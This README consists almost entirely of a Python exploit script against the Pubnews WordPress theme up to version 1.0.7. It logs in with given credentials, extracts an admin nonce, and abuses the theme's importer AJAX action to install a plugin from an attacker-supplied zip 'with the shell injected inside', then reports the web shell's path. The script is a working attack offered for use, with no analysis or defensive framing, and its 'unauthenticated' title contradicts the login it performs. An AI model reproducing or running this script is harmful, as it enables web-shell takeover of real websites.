README.md
Rendering markdown...
import requests
import argparse
import re
# Exploit By Nxploited , Khaled Alenazi
def main():
parser = argparse.ArgumentParser(description='Pubnews <= 1.0.7 - Unauthenticated Arbitrary Plugin Installation # By Nxploited , Khaled alenazi')
parser.add_argument('-u', '--url', required=True, help='The URL of the WordPress site')
parser.add_argument('-un', '--username', required=True, help='The username for WordPress login')
parser.add_argument('-p', '--password', required=True, help='The password for WordPress login')
parser.add_argument('-url_zip', '--plugin_url', required=True, help='The plugin URL to install (must be a zip file with the shell injected inside)')
args = parser.parse_args()
session = requests.Session()
requests.packages.urllib3.disable_warnings()
session.verify = False
login_url = args.url + '/wp-login.php'
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
response = session.post(login_url, verify=False, data={
'log': args.username,
'pwd': args.password,
'rememberme': 'forever',
'wp-submit': 'Log+In'
}, headers={"User-Agent": user_agent})
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully.")
else:
print("[-] Failed to log in.")
exit()
admin_page_url = args.url + '/wp-admin/admin.php?page=pubnews-info'
response = session.get(admin_page_url, verify=False)
wpnonce_match = re.search(r'var pubnewsThemeInfoObject = {.*?"_wpnonce":"([^"]+)"', response.text)
if wpnonce_match:
admin_wpnonce = wpnonce_match.group(1)
print(f"[+] Admin _wpnonce extracted: {admin_wpnonce}")
else:
print("[-] Failed to extract admin _wpnonce.")
exit()
plugin_file = args.plugin_url.split('/')[-1].replace('.zip', '')
plugin_file_path = f"{plugin_file}/{plugin_file.split('.')[0]}.php"
post_url = args.url + '/wp-admin/admin-ajax.php'
headers = {
"User-Agent": user_agent,
"Accept": "*/*",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Referer": args.url + '/wp-admin/admin.php?page=pubnews-info',
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Origin": args.url,
"Connection": "keep-alive",
}
cookies = session.cookies.get_dict()
headers['Cookie'] = '; '.join([f'{name}={value}' for name, value in cookies.items()])
install_data = {
'action': 'pubnews_importer_plugin_action',
'_wpnonce': admin_wpnonce,
'plugin_action': 'not-installed',
'link': args.plugin_url,
'file': plugin_file_path,
'importer_or_not': 'true'
}
response = session.post(post_url, headers=headers, data=install_data, verify=False)
if response.status_code == 200 and 'status' in response.text:
print("[+] Plugin installed successfully.")
print(f"[+] Plugin extracted. You can find the shell here: /wp-content/plugins/{plugin_file}/")
else:
print(f"[-] Failed to install plugin. Status code: {response.status_code}")
print(response.text)
exit()
if __name__ == "__main__":
main()